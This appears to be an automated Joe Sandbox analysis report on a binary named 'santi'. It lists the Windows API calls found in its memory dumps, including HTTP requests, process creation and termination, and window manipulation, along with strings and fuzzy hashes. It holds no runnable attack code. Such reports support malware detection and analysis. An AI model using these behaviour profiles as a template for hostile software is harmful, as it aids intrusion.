                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                • String ID: Ping
                                                                • API String ID: 1028309954-2246546115
                                                                • Opcode ID: 90ce1dcea453b35f423c81c242839dbb980a7814bdf76843ada16b44a2a0064c
                                                                • Instruction ID: 6042d353de98af494e5179aa43cbcc8a4fce83dd1f6af226fb490deca80834a1
                                                                • Opcode Fuzzy Hash: 90ce1dcea453b35f423c81c242839dbb980a7814bdf76843ada16b44a2a0064c
                                                                • Instruction Fuzzy Hash: A15191316047009FDB22AF64CC85B6BB7E8EF49710F058969FA55DB2A1DB70E905CB42
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001), ref: 0032E396
                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0032E40C
                                                                • GetLastError.KERNEL32 ref: 0032E416
                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 0032E483
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                • API String ID: 4194297153-14809454
                                                                • Opcode ID: 1936b8ea3206cb7cf51aa09da7189a916dbf9e0569548c47b99edb8707679541
                                                                • Instruction ID: 3de192696646520f422b4b1ccd2a5e64d971acfa01156a215cbe897796f222c5
                                                                • Opcode Fuzzy Hash: 1936b8ea3206cb7cf51aa09da7189a916dbf9e0569548c47b99edb8707679541
                                                                • Instruction Fuzzy Hash: 6331A635A402159FDB03FFA9EC46EAD77B8EF18304F148015E506EB291DB71AE01CB51
                                                                APIs
                                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0031B98C
                                                                • GetDlgCtrlID.USER32 ref: 0031B997
                                                                • GetParent.USER32 ref: 0031B9B3
                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 0031B9B6
                                                                • GetDlgCtrlID.USER32(?), ref: 0031B9BF
                                                                • GetParent.USER32(?), ref: 0031B9DB
                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 0031B9DE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$CtrlParent
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 1383977212-1403004172
                                                                • Opcode ID: 740e2be5da80ba9b0391c6a8e6152803e9d1cebf8d5d97c9fdc5b0dd55d5d8e3
                                                                • Instruction ID: 8f787b498b550de767a5d5fd7c8730186b3fde6abb3c677c84876511641f9400
                                                                • Opcode Fuzzy Hash: 740e2be5da80ba9b0391c6a8e6152803e9d1cebf8d5d97c9fdc5b0dd55d5d8e3
                                                                • Instruction Fuzzy Hash: 8E21C174A00104BFCF0AABA5CC86EFEBB79EB4A300F504119F651972A1DBB558669B20
                                                                APIs
                                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0031BA73
                                                                • GetDlgCtrlID.USER32 ref: 0031BA7E
                                                                • GetParent.USER32 ref: 0031BA9A
                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 0031BA9D
                                                                • GetDlgCtrlID.USER32(?), ref: 0031BAA6
                                                                • GetParent.USER32(?), ref: 0031BAC2
                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 0031BAC5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$CtrlParent
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 1383977212-1403004172
                                                                • Opcode ID: e3c88d988789f718cbfbd3a61879cd9b48c725152ee717f5e4b5c162642262c9
                                                                • Instruction ID: 619b32aa4ad6113a0f296a6c19a5f8116ae7640e99e933f9c59f114a41c471bc
                                                                • Opcode Fuzzy Hash: e3c88d988789f718cbfbd3a61879cd9b48c725152ee717f5e4b5c162642262c9
                                                                • Instruction Fuzzy Hash: CD21F2B4A40108BFDF06ABA4CC85EFEBB79EF49300F504019F551A72A1DBB5586ADF20
                                                                APIs
                                                                • GetParent.USER32 ref: 0031BAE3
                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 0031BAF8
                                                                • _wcscmp.LIBCMT ref: 0031BB0A
                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0031BB85
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                • API String ID: 1704125052-3381328864
                                                                • Opcode ID: d04209926acea97347a4efa72a02598ed74d34d2ba5e71620167e2ff24374f3f
                                                                • Instruction ID: 39e24ec5f284a259b5a14b9cc4201eab2a6834843477381364ea100dc3c6cf01
                                                                • Opcode Fuzzy Hash: d04209926acea97347a4efa72a02598ed74d34d2ba5e71620167e2ff24374f3f
                                                                • Instruction Fuzzy Hash: F3110A7760C303FAFA2B7624DC16DE7B79C9B19720F204011F904E54D5EFA158915514
                                                                APIs
                                                                • VariantInit.OLEAUT32(?), ref: 0033B2D5
                                                                • CoInitialize.OLE32(00000000), ref: 0033B302
                                                                • CoUninitialize.OLE32 ref: 0033B30C
                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 0033B40C
                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 0033B539
                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0033B56D
                                                                • CoGetObject.OLE32(?,00000000,0036D91C,?), ref: 0033B590
                                                                • SetErrorMode.KERNEL32(00000000), ref: 0033B5A3
                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0033B623
                                                                • VariantClear.OLEAUT32(0036D91C), ref: 0033B633
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                • String ID:
                                                                • API String ID: 2395222682-0
                                                                • Opcode ID: 73105622f2a114535e7daae3c2bc2bd81605a0644b203f774ad0ce2392735406
                                                                • Instruction ID: 6e81b622473400d7a48b644020ea8858c7d22f912068ee8b325ee318ac180e9f
                                                                • Opcode Fuzzy Hash: 73105622f2a114535e7daae3c2bc2bd81605a0644b203f774ad0ce2392735406
                                                                • Instruction Fuzzy Hash: F3C12271608305AFD701DF69C884A6BB7E9FF89308F00491DFA8A9B251DB71ED05CB62
                                                                APIs
                                                                • GetCurrentThreadId.KERNEL32 ref: 00324047
                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003230A5,?,00000001), ref: 0032405B
                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 00324062
                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003230A5,?,00000001), ref: 00324071
                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00324083
                                                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003230A5,?,00000001), ref: 0032409C
                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003230A5,?,00000001), ref: 003240AE
                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003230A5,?,00000001), ref: 003240F3
                                                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003230A5,?,00000001), ref: 00324108
                                                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003230A5,?,00000001), ref: 00324113
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                • String ID:
                                                                • API String ID: 2156557900-0
                                                                • Opcode ID: 9bc0de67a4df381043fe67c9bdbfac724c17f1d51065dc7f0a42b797b6a860fa
                                                                • Instruction ID: 3ac34ebe1b5909f68dd15bc235728421a2781ab45589c472c7c81b97d91b53aa
                                                                • Opcode Fuzzy Hash: 9bc0de67a4df381043fe67c9bdbfac724c17f1d51065dc7f0a42b797b6a860fa
                                                                • Instruction Fuzzy Hash: DC31A271A00224BFDB13DF54EC89B69B7ADBB55721F11C015F905E6290DBB4ED808B60
                                                                APIs
                                                                • GetSysColor.USER32(00000008), ref: 002FB496
                                                                • SetTextColor.GDI32(?,000000FF), ref: 002FB4A0
                                                                • SetBkMode.GDI32(?,00000001), ref: 002FB4B5
                                                                • GetStockObject.GDI32(00000005), ref: 002FB4BD
                                                                • GetClientRect.USER32(?), ref: 0035DD63
                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0035DD7A
                                                                • GetWindowDC.USER32(?), ref: 0035DD86
                                                                • GetPixel.GDI32(00000000,?,?), ref: 0035DD95
                                                                • ReleaseDC.USER32(?,00000000), ref: 0035DDA7
                                                                • GetSysColor.USER32(00000005), ref: 0035DDC5
                                                                APIs
                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 002E30DC
                                                                • CoUninitialize.OLE32(?,00000000), ref: 002E3181
                                                                • UnregisterHotKey.USER32(?), ref: 002E32A9
                                                                • DestroyWindow.USER32(?), ref: 00355079
                                                                • FreeLibrary.KERNEL32(?), ref: 003550F8
                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00355125
                                                                Strings
                                                                • String ID: close all
                                                                APIs
                                                                • SetWindowLongW.USER32(?,000000EB), ref: 002FCC15
                                                                  • Part of subcall function 002FCCCD: GetClientRect.USER32(?,?), ref: 002FCCF6
                                                                  • Part of subcall function 002FCCCD: GetWindowRect.USER32(?,?), ref: 002FCD37
                                                                  • Part of subcall function 002FCCCD: ScreenToClient.USER32(?,?), ref: 002FCD5F
                                                                • GetDC.USER32 ref: 0035D137
                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0035D14A
                                                                • SelectObject.GDI32(00000000,00000000), ref: 0035D158
                                                                • SelectObject.GDI32(00000000,00000000), ref: 0035D16D
                                                                • ReleaseDC.USER32(?,00000000), ref: 0035D175
                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0035D200
                                                                Strings
                                                                • String ID: U
                                                                APIs
                                                                  • Part of subcall function 002FB34E: GetWindowLongW.USER32(?,000000EB), ref: 002FB35F
                                                                  • Part of subcall function 002FB63C: GetCursorPos.USER32(000000FF), ref: 002FB64F
                                                                  • Part of subcall function 002FB63C: ScreenToClient.USER32(00000000,000000FF), ref: 002FB66C
                                                                  • Part of subcall function 002FB63C: GetAsyncKeyState.USER32(00000001), ref: 002FB691
                                                                  • Part of subcall function 002FB63C: GetAsyncKeyState.USER32(00000002), ref: 002FB69F
                                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0034ED3C
                                                                • ImageList_EndDrag.COMCTL32 ref: 0034ED42
                                                                • ReleaseCapture.USER32 ref: 0034ED48
                                                                • SetWindowTextW.USER32(?,00000000), ref: 0034EDF0
                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0034EE03
                                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0034EEDC
                                                                Strings
                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                APIs
                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003345FF
                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0033462B
                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0033466D
                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00334682
                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0033468F
                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003346BF
                                                                • InternetCloseHandle.WININET(00000000), ref: 00334706
                                                                  • Part of subcall function 00335052: GetLastError.KERNEL32(?,?,003343CC,00000000,00000000,00000001), ref: 00335067
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0037DC00), ref: 0033B715
                                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0037DC00), ref: 0033B749
                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0033B8C1
                                                                • SysFreeString.OLEAUT32(?), ref: 0033B8EB
                                                                APIs
                                                                • _memset.LIBCMT ref: 003424F5
                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00342688
                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003426AC
                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003426EC
                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0034270E
                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0034286F
                                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003428A1
                                                                • CloseHandle.KERNEL32(?), ref: 003428D0
                                                                • CloseHandle.KERNEL32(?), ref: 00342947
                                                                APIs
                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0034B3F4
                                                                APIs
                                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0035DB1B
                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0035DB3C
                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0035DB51
                                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0035DB6E
                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0035DB95
                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,002FA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0035DBA0
                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0035DBBD
                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,002FA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0035DBC8
                                                                APIs
                                                                  • Part of subcall function 00326EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00325FA6,?), ref: 00326ED8
                                                                  • Part of subcall function 00326EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00325FA6,?), ref: 00326EF1
                                                                  • Part of subcall function 003272CB: GetFileAttributesW.KERNEL32(?,00326019), ref: 003272CC
                                                                • lstrcmpiW.KERNEL32(?,?), ref: 003275CA
                                                                • _wcscmp.LIBCMT ref: 003275E2
                                                                • MoveFileW.KERNEL32(?,?), ref: 003275FB
                                                                APIs
                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0035DAD1,00000004,00000000,00000000), ref: 002FEAEB
                                                                • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0035DAD1,00000004,00000000,00000000), ref: 002FEB32
                                                                • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0035DAD1,00000004,00000000,00000000), ref: 0035DC86
                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0035DAD1,00000004,00000000,00000000), ref: 0035DCF2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ShowWindow
                                                                • String ID:
                                                                • API String ID: 1268545403-0
                                                                • Opcode ID: 592ef02b9346008dbc9981d8584e838ff1e04febbd31d0e1d0e421ab0287c109
                                                                • Instruction ID: 5613dbcdc3833eeeed98339168abc10694a5a8a331c95bd461f32f95de4f1e69
                                                                • Opcode Fuzzy Hash: 592ef02b9346008dbc9981d8584e838ff1e04febbd31d0e1d0e421ab0287c109
                                                                • Instruction Fuzzy Hash: FB412670638289DADF374F28CD8CE3AFA99BB52349F1B4429E34786971C6B0A850D711
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0031AEF1,00000B00,?,?), ref: 0031B26C
                                                                • HeapAlloc.KERNEL32(00000000,?,0031AEF1,00000B00,?,?), ref: 0031B273
                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0031AEF1,00000B00,?,?), ref: 0031B288
                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,0031AEF1,00000B00,?,?), ref: 0031B290
                                                                • DuplicateHandle.KERNEL32(00000000,?,0031AEF1,00000B00,?,?), ref: 0031B293
                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0031AEF1,00000B00,?,?), ref: 0031B2A3
                                                                • GetCurrentProcess.KERNEL32(0031AEF1,00000000,?,0031AEF1,00000B00,?,?), ref: 0031B2AB
                                                                • DuplicateHandle.KERNEL32(00000000,?,0031AEF1,00000B00,?,?), ref: 0031B2AE
                                                                • CreateThread.KERNEL32(00000000,00000000,0031B2D4,00000000,00000000,00000000), ref: 0031B2C8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                • String ID:
                                                                • API String ID: 1957940570-0
                                                                • Opcode ID: eae9d0447e4539026c055fb5bdd29abf4b3c66408a32c5955557101a056c7cc5
                                                                • Instruction ID: 8a21b7da3ed7062eb2c3d9aea0c61c0c9fd440bc53c372eb8509ef5f6975c935
                                                                • Opcode Fuzzy Hash: eae9d0447e4539026c055fb5bdd29abf4b3c66408a32c5955557101a056c7cc5
                                                                • Instruction Fuzzy Hash: B101F6B5740348BFE711AFA5DC49FAB7BACEB89700F118411FA04CB2A1CAB09800CB21
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                • API String ID: 0-572801152
                                                                • Opcode ID: 1ff92fcd3c94a14845207eba7d8391b847643a7e3543c85c172d0a0e0ec72baa
                                                                • Instruction ID: 63c4ce1dd2f2c84a3427e6fe20d92f7caf65111d4e98f3c171a6e0b4e6e55fb7
                                                                • Opcode Fuzzy Hash: 1ff92fcd3c94a14845207eba7d8391b847643a7e3543c85c172d0a0e0ec72baa
                                                                • Instruction Fuzzy Hash: 2AE1D071A10219AFDF16DFA8D8C1AEEB7B9EF48310F159029F905BB281D770AD41CB90
                                                                APIs
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                  • Part of subcall function 002FC6F4: _wcscpy.LIBCMT ref: 002FC717
                                                                • _wcstok.LIBCMT ref: 0033184E
                                                                • _wcscpy.LIBCMT ref: 003318DD
                                                                • _memset.LIBCMT ref: 00331910
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                • String ID: X$p29l29
                                                                • API String ID: 774024439-1984664996
                                                                • Opcode ID: 826664d1c4dca599653c1c158703e3757c3e2bb1e8c9f1e6cf9584c630dd544e
                                                                • Instruction ID: 7a16e6620a9ad93541095a5c8588e9d8c192b4bcc7ce206dcb47e5ebb148a50e
                                                                • Opcode Fuzzy Hash: 826664d1c4dca599653c1c158703e3757c3e2bb1e8c9f1e6cf9584c630dd544e
                                                                • Instruction Fuzzy Hash: 1CC1AF356143809FC725EF24C891A9EB7E4BF85354F40492DF98A9B2A2DB30EC15CF82
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00349B19
                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 00349B2D
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00349B47
                                                                • _wcscat.LIBCMT ref: 00349BA2
                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00349BB9
                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00349BE7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window_wcscat
                                                                • String ID: SysListView32
                                                                • API String ID: 307300125-78025650
                                                                • Opcode ID: 2107ad1a6c0bb421cd6c1ab3f4312e594fba3ccbf8747d6d94478ab36bc722aa
                                                                • Instruction ID: 4127687358b7c55bc01fd9deb6efe77f517e8cc034acf0572f1c5922d853744b
                                                                • Opcode Fuzzy Hash: 2107ad1a6c0bb421cd6c1ab3f4312e594fba3ccbf8747d6d94478ab36bc722aa
                                                                • Instruction Fuzzy Hash: CC417271A40308AFDB229F64DC85BEB77E8EF08350F11452AF545EB291D671AD85CB60
                                                                APIs
                                                                  • Part of subcall function 00326532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00326554
                                                                  • Part of subcall function 00326532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00326564
                                                                  • Part of subcall function 00326532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 003265F9
                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0034179A
                                                                • GetLastError.KERNEL32 ref: 003417AD
                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003417D9
                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00341855
                                                                • GetLastError.KERNEL32(00000000), ref: 00341860
                                                                • CloseHandle.KERNEL32(00000000), ref: 00341895
